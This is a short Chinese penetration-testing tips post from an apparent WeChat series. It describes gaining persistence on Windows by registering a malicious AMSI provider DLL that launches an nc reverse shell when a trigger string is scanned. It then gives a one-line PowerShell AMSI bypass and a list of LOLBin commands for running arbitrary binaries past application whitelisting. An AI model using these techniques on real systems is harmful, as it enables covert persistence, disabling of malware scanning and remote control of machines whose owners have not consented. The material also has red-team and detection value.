目录

• 使用AMSI扫描接口维持权限

• 绕过AMSI的几种方法

• 一些可尝试绕过白名单的执行

使用AMSI扫描接口维持权限

https://gist.github.com/b4rtik/48ef702603d5e283bc81a05a01fccd40

现amsi已经集成到win10以下组件中

UAC

PowerShell

Windows脚本（wscript.exe和cscript.exe）

JavaScript和VBScript

Office VBA宏

这里使用nc来反弹个shell，要把nc放在隐秘的角落，编译时修改位置即可

使用regsvr32注册dll或手动添加

HKEY_LOCAL_MACHINESOFTWAREClassesCLSIDGUID（默认）REG_SZ "提供程序描述"

HKEY_LOCAL_MACHINESOFTWAREClassesCLSIDGUIDInprocServer32 (默认)

REG_EXPAND_SZ "DLL的路径" -ThreadingModelREG_SZ "Both"

HKLMSOFTWAREMicrosoftAMSIProvidersGUID

Regsvr32使用超管权限

一旦注册，Dll将被加载到任何涉及AMSI和SampleAmsiProvider::Scan方法的进程中，比如在程序中设定，在powershell下发送字符串，触发scan方法，当发送字符串为我们设定的字符串的时候就触发恶意DLL

绕过AMSI的几种方法

https://github.com/crawl3r/FunWithAMSI

直接编译完使用即可

[System.Reflection.Assembly]::LoadFile("C:\Users\test\Desktop\AmsiFun.dll")[Amsi]::Bypass()

一些可尝试绕过白名单的执行

forfiles /p c:windowssystem32 /m notepad.exe /c <bin>explorer.exe /root,"<bin>"pcalua.exe -a <bin>scriptrunner.exe -appvscript <bin>wmic process call create <bin>rundll32.exe advpack.dll, RegisterOCX <bin>

以上内容已加入github

https://github.com/xiaoy-sec/Pentest_Note

本文始发于微信公众号（关注安全技术）：渗透Tips - 第十八期